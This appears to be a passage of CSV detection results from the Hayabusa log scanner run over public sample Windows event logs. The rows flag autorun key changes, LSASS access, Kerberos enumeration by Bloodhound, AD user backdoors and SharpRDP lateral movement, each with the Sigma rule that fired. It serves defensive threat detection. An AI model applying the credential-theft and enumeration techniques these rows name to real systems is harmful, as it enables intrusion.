Explorer.exe,,rules/sigma/process_creation/win_susp_explorer.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.367 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding : Path: C:\Windows\explorer.exe : User: ECORP\Administrator : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.583 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: ""C:\Windows\System32\calc.exe"" : Path: C:\Windows\System32\calc.exe : User: ECORP\Administrator : Parent Command: C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-03 18:05:58.739 +09:00,win10.ecorp.com,1,informational,Process Creation,"Command: ""C:\Windows\System32\win32calc.exe"" : Path: C:\Windows\System32\win32calc.exe : User: ECORP\Administrator : Parent Command: ""C:\Windows\System32\calc.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/susp_explorer_exec_root_cmdline_@rimpq_@CyberRaiju.evtx +2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx +2020-07-04 23:18:58.268 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/evasion_persis_hidden_run_keyvalue_sysmon_13.evtx +2020-07-08 06:51:39.204 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-08 06:51:39.256 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-08 06:51:39.262 +09:00,LAPTOP-JU4M3I0E,10,high,LSASS Access from Program in Suspicious Folder,,rules/sigma/process_access/win_susp_proc_access_lsass_susp_source.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_2x10_lsass_with_different_pid_RtlCreateProcessReflection.evtx +2020-07-09 06:41:52.449 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx +2020-07-09 06:41:52.449 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx +2020-07-09 06:42:01.653 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx +2020-07-09 06:42:01.653 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx +2020-07-09 06:43:13.791 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx +2020-07-09 06:43:13.791 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon_12_DE_AntiForensics_MRU_DeleteKey.evtx +2020-07-10 05:41:04.488 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ATACORE01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.490 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: PKI01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.496 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: EXCHANGE01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.497 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WEC01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.501 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS02$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.505 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WSUS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.534 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: DHCP01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.576 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ATANIDS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.861 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: PRTG-MON$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.862 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: MSSQL01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.863 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.864 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ADFS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.865 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: WEBIIS01$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.885 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: FS03VULN$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.912 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.939 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.949 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.950 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:04.951 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: krbtgt : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:05.016 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC2$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:58.983 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:41:59.810 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN : Service: ROOTDC1$ : IP Address: ::ffff:10.23.23.9 : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx +2020-07-10 05:57:38.917 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59919 : LogonID: 0x64f5bad,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.334 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59920 : LogonID: 0x64f5bf1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.365 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59921 : LogonID: 0x64f5c04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.714 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 59993 : LogonID: 0x64f5c7f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.723 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60017 : LogonID: 0x64f5cb1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.725 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60018 : LogonID: 0x64f5cc8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.728 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: lambda-user : Workstation: - : IP Address: 10.23.23.9 : Port: 60019 : LogonID: 0x64f5cf4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:40.825 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:57:52.909 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ATACORE01$ : Workstation: - : IP Address: 10.23.42.30 : Port: 62476 : LogonID: 0x64f5ef5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:11.977 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59641 : LogonID: 0x64f6471,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:11.981 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: ROOTDC1$ : Workstation: - : IP Address: fe80::1cae:5aa4:9d8d:106a : Port: 51370 : LogonID: 0x64f64a3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:12.004 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59643 : LogonID: 0x64f64ca,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59644 : LogonID: 0x64f64e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.23.9 : Port: 59645 : LogonID: 0x64f64f3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx +2020-07-10 06:22:31.163 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" +2020-07-10 06:25:41.773 +09:00,rootdc1.offsec.lan,5136,high,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx" +2020-07-10 07:00:14.124 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:14.124 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:14.195 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:14.195 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.584 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:17.591 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:28.307 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:28.307 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:28.458 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:28.458 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\notepad.exe"" : Path: C:\Windows\System32\notepad.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,12,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:31.218 +09:00,MSEDGEWIN10,13,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:31.218 +09:00,MSEDGEWIN10,13,medium,Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx +2020-07-10 07:00:42.919 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 